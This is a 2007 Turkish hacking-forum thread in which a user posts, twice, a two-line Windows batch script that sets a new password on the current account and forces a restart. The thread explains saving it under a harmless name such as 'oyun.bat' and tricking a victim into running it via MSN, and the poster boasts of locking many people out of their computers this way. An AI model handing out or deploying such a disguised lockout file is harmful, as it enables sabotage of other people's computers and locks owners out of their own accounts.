mail yoluyla pc kapama süperrrr bakın

by.kiki

Yeni üye
17 Ağu 2007
19
0
kardeşim bunları daha önce kendimde denedim hatta bu yolla çok pcler patlattım aso olmuş ama benim yönten daha aso

by.kiki

Yeni üye
17 Ağu 2007
19
0
arkladaslar cok basıt bılenler vardır ama bılmeyenler ıcın gusel bısey
ilk olarak yeni metin belgesi açıyoruz
sonrada verdiğim kodları yazıyoruz ve uzantısını .bat olarak kaydediyoruz (örnek: oyun.bat)
code:

net user %username% 123456
shutdown -r

bu komutta 123456 yazılı kısım kişinin pc ye koyacagımız şifredir siz deiştirip istediğiniz bir şifreyi koyabilirsiniz
şimdii gelelim kullanıma
verdiğim komutları yazıp .bat olarak kaydetikten sonra oluşan programı msnden karşıtarafa bişekile kabul ettirip yolluyorsunuz adam alınca çıft tıkladığı anda pc'ye şifre yerleşiyor ve pc otomatik olarak kapanıyor bu kapamayı kişi durduramaz
görev yönrticisini bile açsa durduramaz zaten durdursa bile şifre çoktan yerleşmişolur pc'yi kendisi kapadığıanda şifreleniraçıldığında parola sorar bilen açar bilemeyen açamaz... bn şahsen bu programla çok pc inidrdim...

by.kiki

Yeni üye
17 Ağu 2007
19
0
arkladaslar cok basıt bılenler vardır ama bılmeyenler ıcın gusel bısey
ilk olarak yeni metin belgesi açıyoruz
sonrada verdiğim kodları yazıyoruz ve uzantısını .bat olarak kaydediyoruz (örnek: oyun.bat)
code:

net user %username% 123456
shutdown -r

bu komutta 123456 yazılı kısım kişinin pc ye koyacagımız şifredir siz deiştirip istediğiniz bir şifreyi koyabilirsiniz
şimdii gelelim kullanıma
verdiğim komutları yazıp .bat olarak kaydetikten sonra oluşan programı msnden karşıtarafa bişekile kabul ettirip yolluyorsunuz adam alınca çıft tıkladığı anda pc'ye şifre yerleşiyor ve pc otomatik olarak kapanıyor bu kapamayı kişi durduramaz
görev yönrticisini bile açsa durduramaz zaten durdursa bile şifre çoktan yerleşmişolur pc'yi kendisi kapadığıanda şifreleniraçıldığında parola sorar bilen açar bilemeyen açamaz

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.